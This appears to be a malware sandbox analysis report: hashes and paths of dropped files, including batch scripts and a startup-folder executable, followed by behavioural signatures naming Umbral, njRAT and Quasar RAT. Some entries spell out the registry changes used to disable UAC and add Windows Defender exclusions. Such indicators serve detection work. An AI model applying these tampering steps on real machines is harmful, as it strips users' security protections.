| SHA1 | 048e4f859f806012aa221b15967444500168aa07 |
| SHA256 | 43153930c7e2c522d6aa5354ede7d93d00d4376f9cfc4ecd5e5b6b05e809f00e |
| SHA512 | c538b7ee554578dadb33c8166ae41022f35efabc8155c4fe81c1fdee0c404e06482d73bb07d9bb7eb3b26bdbd3935afa4b51c0c7db74584975827b25a1020b5f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2f7f05af4085faaeb1234b9867c53ee0 |
| SHA1 | 06cd753449110c36214a9a12514f860256021629 |
| SHA256 | 36bad66805a5e5acfdd070b9bdb1ad00dbd5d3a508615807862ccb7b7f935aac |
| SHA512 | c7dd07ed20e894301e7da945e63d117a2907c2f85db93331e741f4ed5023aa079103563aa12d07c00860e5d80eda6415ba74cc69a0aa90d98cdaa3079b01512c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0585c71e8b627117018fe98f6d4e997c |
| SHA1 | 7e8be006e0f9b807b909f782d0aa562d52091a26 |
| SHA256 | eeb3dc4089b2c08151d3e8532fa1cabe6de940b566bac0f981b34745c4d30585 |
| SHA512 | b93b45b4861cbf35ff421407b873df0ac9af044086557079225eac6a2c2783a1d1d7f4475f78d1ff427df3e795f88c97c176bb0b265877dca5b6d24aef5f1f27 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 82f7481c6d2657b0751e2f99d8d7f60c |
| SHA1 | 1eff6dc53bdf88795c2db6c2844de695cca37d91 |
| SHA256 | e25f09b908f4fc08eeab97a268de8cb207af1e140f412a6dbd628f173d47a20b |
| SHA512 | 4fe1e2a9af4d9e47ce6c01bae02ffac9f321bfd7d79ddfc58538238d460add90b77e58af0cfbe27e910c9f128c9950170b384f8b0cafc33589ff7ff605112f75 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 200721a4e509b21e31368f1a0bed8a30 |
| SHA1 | ca469b14da46e833784f741e4631359043340391 |
| SHA256 | 208d7946a68e4e60797a310f704871e0a3b2ec6f45d232bfdf34fe445c8e1284 |
| SHA512 | 4b3112f14d3e0c17acd8adc27c3f8a05842763cfb20901e3d59a42d2c8c863cd9d800189cbb9a450d8918aa2b10d37be19aee35a92a2799e840bc1a4d0707229 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 99d58cad8024cdb5efcb790ceeed833b |
| SHA1 | 406f885d63dc90d68f0a9c2b2ad35906f9564f2f |
| SHA256 | 6c67f1c6bba736910695ee40013cbc1dcdb40206a7eaaeb4eb5a1aab6f49d9da |
| SHA512 | f9fbf9256ab6c85cb5f2dc87b5508611190b929b2ab18a2f784f2cc95aea2c69eb9c04010ed1a39dcbcc4a50f70db9488294a182d5a8b5f6579428b47af35135 |
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit
| MD5 | 413dcccf90fdf3971f4515206484c425 |
| SHA1 | 11a604dcc3653196a3bbea431b918f473c4a2b85 |
| SHA256 | e1f53f85431f2b7c0dde53cdde0afef39380835b49a6add8577699574ae40ed0 |
| SHA512 | 42d50a7f371c961cd30f7e3fa311b8df1a93d5314a19fdd6285a0a5aa9f9d886e3b54d6ef62e8304ba00e0fb5f686be44337041f1bfc90e4982ab3a8a0d9dc39 |
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit
| MD5 | 8c4bc7e33b00e0be9a8b8fc11ee2b767 |
| SHA1 | 0fc4b04121eea70779eed2af54ff7969755b2b13 |
| SHA256 | f190ad299ac910b44a64c28eb1e27e042eb4ca6fdcb7087cd82001cac6c4aa5f |
| SHA512 | 5a59da5ab85dcb10e4059721a154e9ab96345811ff01cb5b043370a9e275b1f361666010e01c1a75a8e8e8c46d12b54a8a43d32c3e41820e04dd85ab3ce7dc1f |
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit
| MD5 | bc16bece34decbc4586579142554ed18 |
| SHA1 | 7aa956f194b36d541c71283b6844e54e33f00390 |
| SHA256 | 7c290d277de0aa83de1402478faf3495f0c6e5d3ff1bd96fa0d74dc599ba4bd4 |
| SHA512 | a7481689a29dcab138796909c5536646bd786545c8196276f8bf532e2e9dd498fc7ae2948b455c348872a6754ccbded352f112c3985584f42750db45f80038da |
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit
| MD5 | dd4ab86bba90ccfdf304636ca365a406 |
| SHA1 | 2278c4024f4962a734290e89b516c174d7351e9c |
| SHA256 | bebea0756c4f49c5c2bbf9f66ed707da1d6d2e7d90f9d7c66ac60747af4fead6 |
| SHA512 | 3b361c43bcc0816a397b0705264c266c27dd6ed4a6adef656d71997ce27820f99a57e85d2edb226785e48d76de784169245f3c9530aab0102fc9c95043d7758e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c50fec4e8a9398f6a6080afb78e1b3b1 |
| SHA1 | 5cac0c06e2bf6195a9a2ae59d29b023bce66ae3f |
| SHA256 | c0f82fc52120b9074c12c837f9895b6d9ab5e077f54a75df2e5916d9caf6d89c |
| SHA512 | 2399d37e343a7d9128cd566c13e31954a86b9114f4f417a53b15b47e16da153c5722993ea4f868462e2c5454fcbf68a51f4de6d3008a2eb88e11bb241b6f7486 |
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit
| MD5 | 6e97b1e9e92ae4998cec2f7c538b86da |
| SHA1 | 4990cb26699d69c2a0b503a46addceae58d52772 |
| SHA256 | a1a3d38d86758c746d92ce162dbcf73cf2ef0bcc7ff158969989ddc2312ec203 |
| SHA512 | 4b05b81d46e8efd887eb91d845085c9b83e1a64182e064b757c6d2eb74f2d95b0a325401efbae506fb0e1a278040dd2b23a98fa0b1fff2b80aabc906e1a42eee |
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit
| MD5 | 9fa2cc88f66a81f359ff33af32bc2727 |
| SHA1 | d3a41306961552ae467ed6ae7a456598d2f44e31 |
| SHA256 | eb62c1af572fb36074f3b7ea73f0a191c7cae3eabbe7590874f603b94b960365 |
| SHA512 | d5e545de98c3f93fcd2ff31ac48e7ab8b15a374ab85ffa76dcc2d87ce09964a5f19c77f6339c00725e1a608c05f4f476a4881d7f88bffe56406c497b458298aa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6G4X5UFP\favicon[1].ico
| MD5 | f210fc0564ae5a5a2985b2848e75cba2 |
| SHA1 | 29bf0540e4c291cc6c6d071ac8125cc65314fbe9 |
| SHA256 | d453748d5f8e5bb6c62791b97c733dba1d7dc3340bde957470285b2a7185b7ec |
| SHA512 | 46fac4e98cc34105d74a8a159c70d48191612f88e5ab1a7ee7276e7b2c95407d71d307509ef8b9f0aed28465688839f49b2a55da4b03f7d01b3f03c908067e8c |
memory/1272-4491-0x0000000001260000-0x0000000001584000-memory.dmp
memory/2024-4492-0x0000000000CF0000-0x0000000000D7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd
| MD5 | 7aa447ec3e79e0d47516536d24a56ae5 |
| SHA1 | b91f565b38bbbee8924640507680750757e96ee9 |
| SHA256 | 9b406b2eb50917ab2fd8a494c800665f61adebb878bb21f73b0c477b980957b5 |
| SHA512 | 9a5ed7effc54f1da116c831e9fb3bf1b0d37b2bf6995d18e197ac5330e1100ec98f144148b5285da149df7dd20fe82f62f681f3155b25f922c1b201d82d34e3a |
memory/3844-4518-0x0000000002150000-0x0000000003777000-memory.dmp
memory/3932-4519-0x0000000000A40000-0x0000000002067000-memory.dmp
memory/3144-4544-0x0000000000EA0000-0x00000000011C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat
| MD5 | 02b31070e4106f366e4745a259fd02a2 |
| SHA1 | 1a2e4204c48b0a6bd7dfd58b353a4ddace8478c5 |
| SHA256 | 62eb0559d3fd4b1d90f0bd93f75598a36a64bf72cb541c65eadcdad81fb21cc8 |
| SHA512 | 8f4ce4bfe17a5215d793ad257699d4c00c282e403fc151a3fb27800af874d1f1af4c12bc615b313117780d69976c4ce188acb2c8ab59c93851b06c5bece1d812 |
memory/3052-4581-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/3052-4582-0x0000000001E00000-0x0000000001E08000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat
| MD5 | 98e5e26ecbc0e505b16e1e7d40be8691 |
| SHA1 | 4ccfa88ca0aa3beac694d51121fca07faab88e59 |
| SHA256 | bce48ba09fd04d468aa4b522573ddadf27c6ee42181a6da6f7c7bab896c793ae |
| SHA512 | 2f8ac7be2b7b92ab59bf4ac3646713769f14226ebd99d1226800f0b3be90976a31e79885a9df19c6c459a6d1c4b88e3315c817474d5a5817099d704871adc2c3 |
C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\logo.png
| MD5 | d6bd210f227442b3362493d046cea233 |
| SHA1 | ff286ac8370fc655aea0ef35e9cf0bfcb6d698de |
| SHA256 | 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef |
| SHA512 | 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b |
C:\Program Files (x86)\DroidCam\lib\install.bat
| MD5 | cfaaa32cc4fd40e36512f768bd75a0e1 |
| SHA1 | 6ed1063ab547f65aace2fd98713df6d29834c19a |
| SHA256 | d7b86a37b02fed2794904cb28c0fa64a1e0d2218fab608250c8531c1b9ddc439 |
| SHA512 | d2fe74d8e10b6378c48b72c9e22515a31592859d1f725bc86d9e48fcce9f7421e7afe477feb1c2041ff46b2620ad4244c887c670dc25e8acd70029e2166a0a93 |
memory/3052-4850-0x0000000002A00000-0x0000000002A0C000-memory.dmp
C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp
| MD5 | f6e94e3d7d3fe771b1933e06b7ba79b5 |
| SHA1 | 65da1b5ab85f7b60f88c92101fdf95bfc7fe3931 |
| SHA256 | 2a6124f7df464a02fc560cdf982eb3a65793e0c9252b361ec1e386bf4f63b60c |
| SHA512 | 45cc73010f8b3b638ce7349179a1a603ec009d0ce1066beafa03cc85c3a5a055c6430e50b9e298411d8dd617b698fd49364f8491ac95768a0a91c01c9e4390d4 |
C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp
| MD5 | aed4aa73848bd3423c170bf58f8febfa |
| SHA1 | dfac68f7df29410357c00effee42e40bd0491167 |
| SHA256 | 1cd87356a573e9def505dc8cc5e9f682e3cceecf499f50007b85def3c842b630 |
| SHA512 | 4a9900d422447c59342c88e164d81c4187743e63eb5f993800311397bbdf43bea90e456b720fcd3e679bf029be70220e0b89c60d2717bf278d76c1049d921bfa |
C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp
| MD5 | 65f3e2bdb187ef73ce65b92c770594dd |
| SHA1 | 514f571ed0f89e50b53909e3f9550cad6107ceea |
| SHA256 | 13d6fb4d2284ec6b138740aaef4c7f6ac82e78d59891f4e51c8656f05150db8e |
| SHA512 | 2b5def159bd09b20cbcd03de3d2973c1fd216b35de71006c3077aeeddb71165075545941ebd53807fdd5cf682ec3eaadaeab9504b55a85c895cc1b811cf1a0c0 |
C:\Windows\Temp\CabD0D8.tmp
| MD5 | d59a6b36c5a94916241a3ead50222b6f |
| SHA1 | e274e9486d318c383bc4b9812844ba56f0cff3c6 |
| SHA256 | a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53 |
| SHA512 | 17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489 |
C:\Windows\Temp\TarD0EB.tmp
| MD5 | b13f51572f55a2d31ed9f266d581e9ea |
| SHA1 | 7eef3111b878e159e520f34410ad87adecf0ca92 |
| SHA256 | 725980edc240c928bec5a5f743fdabeee1692144da7091cf836dc7d0997cef15 |
| SHA512 | f437202723b2817f2fef64b53d4eb67f782bdc61884c0c1890b46deca7ca63313ee2ad093428481f94edfcecd9c77da6e72b604998f7d551af959dbd6915809c |
memory/2428-4912-0x0000000000FC0000-0x00000000012E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat
| MD5 | f80c74ceb3473412beefb75d97bab0ef |
| SHA1 | a7cb219cd61d9ed1ca21c59a263c598ad96e4d0a |
| SHA256 | 377fef8da77cbfcf117e1ce269ae60961ca8cf99937997820f50ab3259da1cd7 |
| SHA512 | 3606f0ee94539242a0e45460a31863a3813118d71dd04925c811caf94f327cebbe114c5d11c314a1cea87acf511e3c04e3b8301b1ea79841fbc16d15a9628373 |
C:\Program Files (x86)\DroidCam\DroidCamApp.exe
| MD5 | f8c12fc1b20887fdb70c7f02f0d7bfb3 |
| SHA1 | 28d18fd281e17c919f81eda3a2f0d8765f57049f |
| SHA256 | 082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933 |
| SHA512 | 97c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f |
C:\Program Files (x86)\DroidCam\Uninstall.exe
| MD5 | de2a97a1e50afa4fec443a8930606ddf |
| SHA1 | 4133434c37472ab14443704dd9ad8e8546f3098f |
| SHA256 | 5cf6e6e22cba884b20da6cf701546613792c15f30d4c27273a432fb185f29416 |
| SHA512 | d25e638a7925d0be5bbb081f5edda506603252916c3d3868d2bcdcc31484547efb893130a6b5eccc781bfece702c59d34fe67a84a48e379916fc15568adcdc49 |
C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\System.dll
| MD5 | c9473cb90d79a374b2ba6040ca16e45c |
| SHA1 | ab95b54f12796dce57210d65f05124a6ed81234a |
| SHA256 | b80a5cba69d1853ed5979b0ca0352437bf368a5cfb86cb4528edadd410e11352 |
| SHA512 | eafe7d5894622bc21f663bca4dd594392ee0f5b29270b6b56b0187093d6a3a103545464ff6398ad32d2cf15dab79b1f133218ba9ba337ddc01330b5ada804d7b |
C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\nsExec.dll
| MD5 | 0a6f707fa22c3f3e5d1abb54b0894ad6 |
| SHA1 | 610cb2c3623199d0d7461fc775297e23cef88c4e |
| SHA256 | 370e47364561fa501b1300b056fb53fae12b1639fdf5f113275bee03546081c0 |
| SHA512 | af0c8ca0c892f1b757fbd700061f3d81417dff11d89bdff45e977de81ad51c97862406cf7e230e76cf99497f93f57bf09609740953cd81b0d795465ac2623ea8 |
C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\nsDialogs.dll
| MD5 | 12465ce89d3853918ed3476d70223226 |
| SHA1 | 4c9f4b8b77a254c2aeace08c78c1cffbb791640d |
| SHA256 | 5157fe688cca27d348171bd5a8b117de348c0844ca5cb82bc68cbd7d873a3fdc |
| SHA512 | 20495270bcd0cae3102ffae0a3e783fad5f0218a5e844c767b07a10d2cfab2fab0afb5e07befa531ba466393a3d6255741f89c6def21ec2887234f49adceea2f |
memory/3140-5039-0x00000000002F0000-0x0000000000614000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat
| MD5 | 4422d2e48949e48c573277d1be4081f0 |
| SHA1 | eb2315dc1f93755618bbb29f3dc77d2d5d36cb3a |
| SHA256 | d8fe293748dc53db9114169096f9d924f43cebb62e365136ff2cec6dbc4124d2 |
| SHA512 | a0feb94660141857032f8503603cd5ca7e473dd70c1846c6f331fa30e89ac247be052af8a35d8cf07c8b730ee21ca39cb99001a43466936c8136414be8a8e16c |
memory/3292-5317-0x0000000000ED0000-0x00000000011F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat
| MD5 | 6fe63378a187e858c5c5a54ebff68200 |
| SHA1 | bd642e0575619db40cc78aaf01632be53a7a246a |
| SHA256 | 444da56cbb00149d18365bc2df5c4b50b1821b1cd374570e166d4df746fa6d4e |
| SHA512 | d42b1075d336d879d57d7a42993fec19838795796206ab412966e56ca498531d2e2fe743ee743ce8ca197d6f9e6f05fc571255518aef1485265122cd6a52b443 |
memory/992-5433-0x0000000000110000-0x0000000000434000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat
| MD5 | ff4b687cd6a8ad2cdacab585ecdd8230 |
| SHA1 | b0cf361102a64ccfc7c0d2542ee47591a0817ff1 |
| SHA256 | bc7c33bc3b8c84cdd8137e391cf45bf54fa9acf657786bb6da5301aee8a986bc |
| SHA512 | 6c0656067dee8db634f52e36d86b2f48e5f0123e0d8f49e451326e17ada259b5c4add7f6c95ddb4bfa69f84ef362a0f6f36992efa4d90b37be705a4c10cd7538 |
memory/480-5605-0x00000000056D0000-0x0000000005B0E000-memory.dmp
memory/480-5608-0x00000000056D0000-0x0000000005B0E000-memory.dmp
memory/3052-5607-0x0000000000400000-0x000000000083E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat
| MD5 | 202d76eb2952aeb2e241c13defe48045 |
| SHA1 | 34e26a3407288c7ea63bd1cd305c27b06b163386 |
| SHA256 | 9d99aa3263624e3a9434af76bac620f71598c082b35504de738d1c04af079fab |
| SHA512 | 6a78847878c3ee4ef82a61d03e4f61f681ad7c2d62d5ff10645f17fa2acf63bc76b5862043bb94eaf7d80ce0ab2c35a904ef6de178623d42111c453c5ee9f3d3 |
memory/2872-5622-0x0000000000160000-0x00000000001AA000-memory.dmp
memory/2872-5623-0x0000000000290000-0x00000000002B4000-memory.dmp
memory/3332-5640-0x00000000012A0000-0x00000000012E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd
| MD5 | be6bfde09df708f7e8cbda39a6ab17f6 |
| SHA1 | dc7f48ebf62fdd4b2a2935b23245a20bb9c3b237 |
| SHA256 | fe1a8ee1e2d6da92ea4a8bb0ab40b7bf8d06cd571bf627671838ac8dce3c15e8 |
| SHA512 | 71751cf9e79e50a330bf1e237ce507799d965b2b56e196ee23cdb96aadbc8538fa57fe6fbb8415678da35fa98abc0e746c0c7570d6ea155ea7bd6be840d7177e |
memory/3112-5650-0x0000000000970000-0x000000000097A000-memory.dmp
memory/848-5787-0x0000000000320000-0x0000000000644000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat
| MD5 | c7458c30bc8333e28b866de22462fad6 |
| SHA1 | f8fd0979872e13829333725d1a97ab12d8402a7c |
| SHA256 | cb0042e879499b7739503d64ca310d1d4249810144d868f15185bf42fcfa4e12 |
| SHA512 | 65b73315634620b1e56ecd1190087716dd2f067d74f8c5ce4a675baa8042b8d4e526dfa3c3daaff3f566b130f62a15f0583b65281c31eafd08281084c463f51e |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml
| MD5 | c1ddea3ef6bbef3e7060a1a9ad89e4c5 |
| SHA1 | 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966 |
| SHA256 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db |
| SHA512 | 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed |
memory/3052-5921-0x0000000000400000-0x000000000083E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml
| MD5 | 570be43add1e20c58bd6824598fb0f4c |
| SHA1 | 9401e2ca69b6d56a220518e63e8e5337dd6d45ec |
| SHA256 | 553470049060e2b179427ffaec4820c38b76bc4f577dba3bdadb35567026ee75 |
| SHA512 | fbbfd7570f805842e0aea53828b7fa34adeb780e9fa577ff3d8caea70545d78922ee5149f292c9a982ea8508fca8f0795001773720e5938f3bfedc528c5754d5 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml
| MD5 | 32fbb5ad9bf5593630facff0e5a0c5a9 |
| SHA1 | e4ff808ac5b2aef1b2c7c2a2be17484c4d944c73 |
| SHA256 | 17c4cdb8aff9a91149e5fb67d11ce348ed6b001327f3190e4b02c8fa2cf90c0e |
| SHA512 | b1fcb732ab928c8f97e2269c198c3fdf6385c7f00f03dc87a8ce81c92db529bc8912b4b53b0b7412a1f484d79cacab432f73d6689081b7b6104f05a10f1ff012 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe
| MD5 | ad8378c96a922dcfe813935d1eec9ae4 |
| SHA1 | 0e7ee31880298190258f5282f6cc2797fccdc134 |
| SHA256 | 9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98 |
| SHA512 | d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f |
memory/480-5964-0x00000000056D0000-0x0000000005B0E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml
| MD5 | 1fa3965f51e94fac2988005e81dff06b |
| SHA1 | ccf56e2d64c083f21bb9f9a0125cb5f41f485d88 |
| SHA256 | d6c37a810aab3ab3f751d2c952aade36ae5fa9cc5418c3871f10fe2670834ff4 |
| SHA512 | 40e23d16fb9976d0f798525dbb44b570b9cd5a6369a4efc144e76c8417a090eda9d4a5d852cabc81d3c9f6c4f05372616e304d5fea40896dcb05f7e09659221e |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml
| MD5 | 1540df8bb77b75cacd201783901976c4 |
| SHA1 | aed61ae8611aa24ecc547da38c48c395b47a7314 |
| SHA256 | a039e3d2553064dcd5075aedfc7ca42120be2cadbb3b3af2b694fd89f1adf1a4 |
| SHA512 | f82615834b31c7fff60badea127c2d51b3d170a8906733cb7ed93343b360fe269492a599c57dfcb0ce1f77ce9bebaa9ee7f230657a93af9ff8eb9c4c607657c3 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml
| MD5 | 25ab1c6bc25ff38b6b50fd3a36065049 |
| SHA1 | a13b75264171ab7eeba96007e326ccdb8dd6f12b |
| SHA256 | fd8daee4a5abcbed5ad932b39c487a246008142bacfaad4cd821b038f4961077 |
| SHA512 | 520da2cf7941d4ec07404fc3521a518c836b2f8483a4fcb587d02940205bc1193b03619a33a9a9eed2d6b384090fe8ddbd558757a9650081e6c3d73fafee3921 |
memory/3336-6009-0x0000000000A50000-0x0000000000D74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat
| MD5 | adc3c96844112c850fe54692c5b80167 |
| SHA1 | 157361c825271ccc1c2b0db70cca3c899ee33eb2 |
| SHA256 | 244e0c80661bc8f95f7cdc2430058cbed53037c7dfbca804609aaae10990e4e4 |
| SHA512 | b36614b0cdabb2fb8f809854202b159f92a7dc0e86d4f863d391acfe28ac472512c08f350b7d8143745575eafa25df893508af88fb2861a2f9c8edd578b78f0c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\favicon[1].ico
| MD5 | f3418a443e7d841097c714d69ec4bcb8 |
| SHA1 | 49263695f6b0cdd72f45cf1b775e660fdc36c606 |
| SHA256 | 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770 |
| SHA512 | 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563 |
memory/1540-6139-0x00000000012F0000-0x0000000001614000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat
| MD5 | 7cd9f0ed81ac6fe05eb78182b6e92f13 |
| SHA1 | 469adadd0946b912df1a5ceded0389b47296ca5e |
| SHA256 | 0973a3ff63012b6cef5b018b55ab11f25dce0503b1b400a787d226dd317f21f2 |
| SHA512 | cea3e6d7d2884656ea0c784f8a69d48214ae68bec4da588df584b24209db6447e69f525bf72640b34e663d055d7e9557c2a873f4499d56cd8d491e0cc2de981e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\4Kv5U5b1o3f[1].png
| MD5 | a81a5e7f71ae4153e6f888f1c92e5e11 |
| SHA1 | 39c3945c30abff65b372a7d8c691178ae9d9eee0 |
| SHA256 | 2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e |
| SHA512 | 1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69 |
memory/912-6255-0x0000000000040000-0x0000000000364000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat
| MD5 | 910feec4f11dbdef969865431e445035 |
| SHA1 | e692184390c08c8ab3825e2c29ec9800dafe61bb |
| SHA256 | 2e5c1de991e99fe355c2e1b6b3c7cb0af07606c11af1ab367019d6c055e11358 |
| SHA512 | 9bb0de54a43f5471657febee6fd76a60ed155d5f76db4a81ae2d6604488e2b683e2118015d43441cea104083e887e2f6717d76e8a3b40506a51cf5a481b3a279 |
C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat
| MD5 | 56e53e075c0c239b6e0894b48eb32a00 |
| SHA1 | 2cd05795364394a3cfdfd6f6cf7ad1b1eddf648f |
| SHA256 | eba4142dd3da2000dda3079fbe02312487becb7a02d4e59be3e52169b7a6ef14 |
| SHA512 | 55938793e568e118218479abb073008b4aa929f92664e20fde724dd4db7ecaee60b9ea7a4cf1a7873bd1e606b8d8baaa5d51fa1f0958c41086199531a56a26ed |
C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat
| MD5 | 42e1f9853f09310a2c8f4be7169c183c |
| SHA1 | fec36846639a1b09fe2547d6678f95614ff89578 |
| SHA256 | 55801fa3568aff97a69eaee89e6586960d71a185ba197c521890b4c936fe727e |
| SHA512 | 62f54f99621ed8e84448b250d17d0a833dda5e7a85d918496fc974f26625b8c2f40c55ac5fd5eaff83b0f1ee69c8b18dce2bda83ac8517da70674364ef378dca |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 09:16
Reported
2024-11-08 09:21
Platform
win10v2004-20241007-en
Max time kernel
152s
Max time network
166s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Umbral
Umbral family
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
njRAT/Bladabindi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\1CCF8823482A12F66BA7C629093B98DF77300697\Blob = (binary certificate blob elided) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
